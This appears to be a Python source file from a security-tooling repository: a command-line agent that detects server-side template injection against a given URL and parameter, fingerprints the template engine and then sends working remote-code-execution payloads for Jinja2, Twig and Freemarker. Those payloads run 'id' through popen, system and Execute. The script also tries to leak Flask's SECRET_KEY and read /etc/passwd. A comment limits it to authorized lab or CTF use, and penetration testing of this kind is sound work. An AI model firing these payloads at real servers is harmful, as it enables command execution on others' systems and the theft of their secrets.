Files
mukul975 27c6414ca5 Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills
Complete skill folder anatomy across all cybersecurity skills:
- scripts/agent.py: 80-150 line Python agents using real libraries (impacket,
  boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.)
- references/api-reference.md: real API documentation with method signatures
- LICENSE: MIT license for all skill folders
2026-03-10 21:02:12 +01:00

206 lines
7.8 KiB
Python

#!/usr/bin/env python3
# For authorized testing in lab/CTF environments only
"""Server-Side Template Injection (SSTI) detection agent using requests."""
import argparse
import json
import logging
import sys
import urllib.parse
from typing import List, Optional
try:
import requests
except ImportError:
sys.exit("requests is required: pip install requests")
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
logger = logging.getLogger(__name__)
DETECTION_PAYLOADS = {
"jinja2_twig": {"payload": "{{7*7}}", "expected": "49"},
"freemarker": {"payload": "${7*7}", "expected": "49"},
"thymeleaf": {"payload": "#{7*7}", "expected": "49"},
"erb_ejs": {"payload": "<%= 7*7 %>", "expected": "49"},
"smarty": {"payload": "{7*7}", "expected": "49"},
"velocity": {"payload": "#set($x=7*7)$x", "expected": "49"},
"dotjs": {"payload": "{{= 7*7}}", "expected": "49"},
}
ENGINE_FINGERPRINTS = {
"jinja2": {"payload": "{{7*'7'}}", "expected": "7777777"},
"twig": {"payload": "{{7*'7'}}", "expected": "49"},
"freemarker_confirm": {"payload": "${.now}", "match_pattern": r"\d{4}"},
"flask_config": {"payload": "{{config}}", "match_pattern": r"SECRET_KEY|DEBUG"},
}
def test_ssti_detection(url: str, param: str, method: str = "GET",
headers: Optional[dict] = None) -> List[dict]:
"""Test all detection payloads against a parameter."""
results = []
for engine, test in DETECTION_PAYLOADS.items():
payload = test["payload"]
expected = test["expected"]
resp = _send_payload(url, param, payload, method, headers)
found = expected in resp.text
results.append({
"engine_hint": engine,
"payload": payload,
"expected": expected,
"found_in_response": found,
"status_code": resp.status_code,
})
if found:
logger.warning("SSTI detected with %s payload: %s", engine, payload)
return results
def identify_engine(url: str, param: str, method: str = "GET",
headers: Optional[dict] = None) -> dict:
"""Identify the specific template engine in use."""
import re
resp_jinja = _send_payload(url, param, "{{7*'7'}}", method, headers)
if "7777777" in resp_jinja.text:
return {"engine": "Jinja2", "language": "Python", "framework": "Flask/Django"}
if "49" in resp_jinja.text:
return {"engine": "Twig", "language": "PHP", "framework": "Symfony/Laravel"}
resp_fm = _send_payload(url, param, "${.now}", method, headers)
if re.search(r"\d{4}", resp_fm.text):
return {"engine": "Freemarker", "language": "Java", "framework": "Spring"}
resp_config = _send_payload(url, param, "{{config}}", method, headers)
if "SECRET_KEY" in resp_config.text or "DEBUG" in resp_config.text:
return {"engine": "Jinja2", "language": "Python", "framework": "Flask"}
resp_velocity = _send_payload(url, param, "#set($x=42)$x", method, headers)
if "42" in resp_velocity.text:
return {"engine": "Velocity", "language": "Java", "framework": "Apache Velocity"}
return {"engine": "unknown"}
def test_jinja2_rce(url: str, param: str, method: str = "GET",
headers: Optional[dict] = None) -> List[dict]:
"""Test Jinja2 RCE payloads."""
payloads = [
{"name": "cycler_popen", "payload": "{{cycler.__init__.__globals__.os.popen('id').read()}}"},
{"name": "lipsum_popen", "payload": '{{lipsum.__globals__["os"].popen("id").read()}}'},
{"name": "config_items", "payload": "{{config.items()}}"},
{"name": "secret_key", "payload": "{{config.SECRET_KEY}}"},
]
results = []
for p in payloads:
resp = _send_payload(url, param, p["payload"], method, headers)
has_output = (
"uid=" in resp.text or "SECRET_KEY" in resp.text or
"root" in resp.text or len(resp.text) > 500
)
results.append({
"name": p["name"],
"payload": p["payload"],
"status_code": resp.status_code,
"rce_confirmed": "uid=" in resp.text,
"info_leak": "SECRET_KEY" in resp.text or "config" in resp.text.lower(),
"response_preview": resp.text[:200],
})
return results
def test_twig_rce(url: str, param: str, method: str = "GET",
headers: Optional[dict] = None) -> List[dict]:
"""Test Twig (PHP) RCE payloads."""
payloads = [
{"name": "filter_system", "payload": "{{['id']|filter('system')}}"},
{"name": "file_excerpt", "payload": "{{'/etc/passwd'|file_excerpt(1,5)}}"},
]
results = []
for p in payloads:
resp = _send_payload(url, param, p["payload"], method, headers)
results.append({
"name": p["name"],
"payload": p["payload"],
"status_code": resp.status_code,
"rce_confirmed": "uid=" in resp.text or "root:" in resp.text,
"response_preview": resp.text[:200],
})
return results
def test_freemarker_rce(url: str, param: str, method: str = "GET",
headers: Optional[dict] = None) -> List[dict]:
"""Test Freemarker (Java) RCE payloads."""
payloads = [
{"name": "execute_class",
"payload": '<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}'},
]
results = []
for p in payloads:
resp = _send_payload(url, param, p["payload"], method, headers)
results.append({
"name": p["name"],
"status_code": resp.status_code,
"rce_confirmed": "uid=" in resp.text,
"response_preview": resp.text[:200],
})
return results
def _send_payload(url: str, param: str, payload: str, method: str = "GET",
headers: Optional[dict] = None) -> requests.Response:
h = headers or {}
encoded = urllib.parse.quote(payload)
try:
if method.upper() == "GET":
sep = "&" if "?" in url else "?"
return requests.get(f"{url}{sep}{param}={encoded}", headers=h,
timeout=10, verify=False)
else:
return requests.post(url, data={param: payload}, headers=h,
timeout=10, verify=False)
except requests.RequestException:
return type("R", (), {"status_code": 0, "text": "", "content": b""})()
def run_assessment(url: str, param: str, method: str = "GET") -> dict:
"""Run complete SSTI assessment."""
detection = test_ssti_detection(url, param, method)
vulnerable = any(d["found_in_response"] for d in detection)
result = {
"target": url, "parameter": param, "vulnerable": vulnerable,
"detection_results": detection,
}
if vulnerable:
engine = identify_engine(url, param, method)
result["engine"] = engine
if engine.get("engine") == "Jinja2":
result["rce_tests"] = test_jinja2_rce(url, param, method)
elif engine.get("engine") == "Twig":
result["rce_tests"] = test_twig_rce(url, param, method)
elif engine.get("engine") == "Freemarker":
result["rce_tests"] = test_freemarker_rce(url, param, method)
return result
def main():
parser = argparse.ArgumentParser(description="SSTI Detection Agent")
parser.add_argument("--url", required=True, help="Target URL")
parser.add_argument("--param", required=True, help="Parameter to test")
parser.add_argument("--method", default="GET", choices=["GET", "POST"])
parser.add_argument("--output", default="ssti_report.json")
args = parser.parse_args()
report = run_assessment(args.url, args.param, args.method)
with open(args.output, "w") as f:
json.dump(report, f, indent=2)
logger.info("Report saved to %s", args.output)
print(json.dumps(report, indent=2))
if __name__ == "__main__":
main()